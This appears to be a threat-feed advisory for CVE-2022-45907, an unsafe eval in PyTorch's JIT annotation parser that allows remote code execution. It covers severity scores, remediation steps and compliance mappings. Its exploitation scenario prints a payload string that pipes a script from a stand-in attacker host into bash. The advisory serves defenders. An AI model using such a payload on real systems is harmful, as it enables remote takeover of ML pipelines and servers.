AI Threat Alert

CVE-2022-45907: PyTorch: RCE via unsafe eval in JIT annotations

CRITICAL PoC AVAILABLE
Published November 26, 2022
CISO Take

Any PyTorch deployment processing untrusted model files or scripts is exposed to unauthenticated remote code execution — this includes model serving APIs, MLOps pipelines, and shared training infrastructure. Patch immediately to commit 767f6aa or later. Treat all PyTorch processes handling external model inputs as a high-privilege attack surface until patched.

What is the risk?

Critical. CVSS 9.8 with network-accessible, zero-auth, zero-interaction exploitation. PyTorch is the dominant ML framework across both research and production, making the blast radius enormous. Exploitation is trivial — crafting a malicious type annotation string requires no specialized ML knowledge. Unpatched model serving endpoints or collaborative ML platforms (Jupyter, MLflow, Weights & Biases integrations) represent the highest-risk exposure.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PyTorch pip No patch
100.9K OpenSSF 6.4 22.7K dependents Pushed 3d ago 11% patched ~216d to patch Full package profile →

Do you use PyTorch? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
1.2%
chance of exploitation in 30 days
Higher than 64% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. Patch: apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a version past PyTorch trunk/89695.

  2. Workaround: block processing of untrusted PyTorch model files until patched; enforce allowlisting of model sources in MLOps pipelines.

  3. Isolate: run model loading and inference in sandboxed containers with minimal permissions and no network egress.

  4. Detect: alert on unexpected subprocess creation, outbound connections, or file writes originating from PyTorch inference/training processes.

  5. Audit: inventory all systems loading external .pt/.pth files or TorchScript definitions — prioritize public-facing model APIs.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework Inference AML.T0010.001 AML.T0011.000 AML.T0049 AML.T0050

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.8.1 - AI system development processes
NIST AI RMF
MANAGE 2.4 - Residual risks from AI system components are monitored and managed
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2022-45907?

Any PyTorch deployment processing untrusted model files or scripts is exposed to unauthenticated remote code execution — this includes model serving APIs, MLOps pipelines, and shared training infrastructure. Patch immediately to commit 767f6aa or later. Treat all PyTorch processes handling external model inputs as a high-privilege attack surface until patched.

Is CVE-2022-45907 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2022-45907, increasing the risk of exploitation.

How to fix CVE-2022-45907?

1. Patch: apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a version past PyTorch trunk/89695. 2. Workaround: block processing of untrusted PyTorch model files until patched; enforce allowlisting of model sources in MLOps pipelines. 3. Isolate: run model loading and inference in sandboxed containers with minimal permissions and no network egress. 4. Detect: alert on unexpected subprocess creation, outbound connections, or file writes originating from PyTorch inference/training processes. 5. Audit: inventory all systems loading external .pt/.pth files or TorchScript definitions — prioritize public-facing model APIs.

What systems are affected by CVE-2022-45907?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, MLOps pipelines, inference APIs.

What is the CVSS score for CVE-2022-45907?

CVE-2022-45907 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.19%.

What is the AI security impact?

Affected AI Architectures

training pipelinesmodel servingmodel registriesMLOps pipelinesinference APIs

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.8.1
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

In PyTorch before trunk/89695, torch.jit.annotations.parse_type_line can cause arbitrary code execution because eval is used unsafely.

Exploitation Scenario

An adversary publishes a malicious PyTorch model file to a public model hub (e.g., Hugging Face) or injects it into a shared model registry. The file contains a crafted TorchScript type annotation: parse_type_line receives a string like '__import__("os").system("curl attacker.com/shell.sh | bash")' as a type hint. When any downstream ML pipeline loads this model for inference or fine-tuning, PyTorch's JIT compiler processes the annotation via eval(), executing the payload with the service's OS-level privileges. No authentication, user interaction, or ML expertise required — the exploit is effectively a supply chain attack against every consumer of the poisoned artifact.

Weaknesses (CWE)

CWE-94 Improper Control of Generation of Code ('Code Injection') Primary CWE-94 Improper Control of Generation of Code ('Code Injection')

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
November 26, 2022
Last Modified
April 25, 2025
First Seen
November 26, 2022

Related Vulnerabilities

CRITICAL CVE-2024-5452 9.8

pytorch-lightning: RCE via deepdiff Delta deserialization

Same package: torch
CRITICAL CVE-2024-35198 9.8

TorchServe: URL bypass enables arbitrary model loading

Same package: torch
CRITICAL CVE-2023-43654 9.8

TorchServe: SSRF + RCE via unrestricted model URL loading

Same package: torch
CRITICAL CVE-2022-0845 9.8

pytorch-lightning: code injection enables full RCE

Same package: torch
CRITICAL CVE-2024-48063 9.8

PyTorch: RCE via RemoteModule deserialization

Same package: torch
Back to Threat Feed